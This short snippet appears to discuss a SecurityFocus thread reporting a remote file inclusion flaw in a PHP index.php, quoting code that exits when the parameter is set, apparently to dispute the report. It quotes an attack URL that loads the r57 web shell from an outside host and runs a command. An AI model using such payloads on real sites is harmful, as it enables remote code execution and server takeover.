Link: http://www.securityfocus.com/archive/1/465735/30/0/threaded Author: k4rtal[at]gmail[dot]com Quote from the thread: "index.php?path_to_folder=http://shelladresin.com/r57.txt?cmd=id" index.php: if (isset($_GET['path_to_folder'])) { exit; } $path_to_folder = dirname(__FILE__).'/';